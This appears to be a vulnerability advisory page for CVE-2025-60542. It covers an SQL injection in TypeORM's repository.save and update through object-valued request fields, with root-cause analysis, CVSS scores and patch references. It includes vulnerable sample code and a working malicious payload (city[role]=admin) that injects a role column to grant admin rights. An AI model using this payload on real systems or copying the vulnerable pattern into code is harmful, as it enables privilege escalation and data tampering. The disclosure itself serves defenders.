CVE-2025-60542
MEDIUM6.5EPSS 0.04%TypeORM vulnerable to SQL injection via crafted request to repository.save or repository.update
Description
### Summary SQL Injection vulnerability in TypeORM before 0.3.26 via crafted request to repository.save or repository.update due to the sqlstring call using stringifyObjects default to false. ### Details Vulnerable Code: ```js const { username, city, name} = req.body; const updateData = { username, city, name, id:userId }; // Developer aims to only allow above three fields to be updated const result = await userRepo.save(updateData); ``` Intended Payload (non-malicious): ` username=myusername&city=Riga&name=Javad ` _OR_ `{username:\"myusername\",phone:12345,name:\"Javad\"} ` SQL query produced: ```sql UPDATE `user` SET `username` = 'myusername', `city` = 'Riga', `name` = 'Javad' WHERE `id` IN (1); ``` Malicious Payload: `username=myusername&city[name]=Riga&city[role]=admin ` _OR_ `{username:\"myusername\",city:{name:\"Javad\",role:\"admin\"}} ` SQL query produced with Injected Column: ```sql UPDATE `user` SET `username` = 'myusername', `city` = `name` = 'Javad', `role` = 'admin' WHERE `id` IN (1); ``` _Above query is valid as `city` = `name` = `Javad` is a boolean expression resulting in `city` = 1 (false). “role” column is injected and updated._ Underlying issue was due to TypeORM using mysql2 [without specifying a value for the stringifyObjects option](https://github.com/typeorm/typeorm/blob/0.3.25/src/driver/mysql/MysqlConnectionOptions.ts). In both mysql and mysql2 this [option defaults to false](https://github.com/sidorares/node-mysql2/blob/e359f454a76ba5dc31b91adf7bdb4099ca317bb5/lib/connection_config.js#L124). This option is then passed into [SQLString library as false](https://github.com/sidorares/node-mysql2/blob/e359f454a76ba5dc31b91adf7bdb4099ca317bb5/lib/base/connection.js#L524). This results in sqlstring [parsing objects in a strange way using objectToValues.](https://github.com/mysqljs/sqlstring/blob/cd528556b4b6bcf300c3db515026935dedf7cfa1/lib/SqlString.js#L54)
Affected packages (1)
- npm/typeormfrom 0, < 0.3.26
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:L/SI:H/SA:L/E:P |
| osv | CVSS 3.1 | MEDIUM6.5 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N |
References (11)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2025-60542
- PATCHhttp://github.com/typeorm/typeorm
- WEBhttps://github.com/mysqljs/sqlstring/blob/cd528556b4b6bcf300c3db515026935dedf7cfa1/lib/SqlString.js#L54
- WEBhttps://github.com/sidorares/node-mysql2/blob/e359f454a76ba5dc31b91adf7bdb4099ca317bb5/lib/base/connection.js#L524
- WEBhttps://github.com/sidorares/node-mysql2/blob/e359f454a76ba5dc31b91adf7bdb4099ca317bb5/lib/connection_config.js#L124
- WEBhttps://github.com/typeorm/typeorm/blob/0.3.25/src/driver/mysql/MysqlConnectionOptions.ts
- WEBhttps://github.com/typeorm/typeorm/commit/d57fe3bd8578b0b8f9847647fd046bccf825a7ef
- WEBhttps://github.com/typeorm/typeorm/pull/11574
- WEBhttps://github.com/typeorm/typeorm/releases?q=security&expanded=true
- WEBhttps://github.com/typeorm/typeorm/releases/tag/0.3.26
- WEBhttps://medium.com/@alizada.cavad/cve-2025-60542-typeorm-mysql-sqli-0-3-25-a1b32bc60453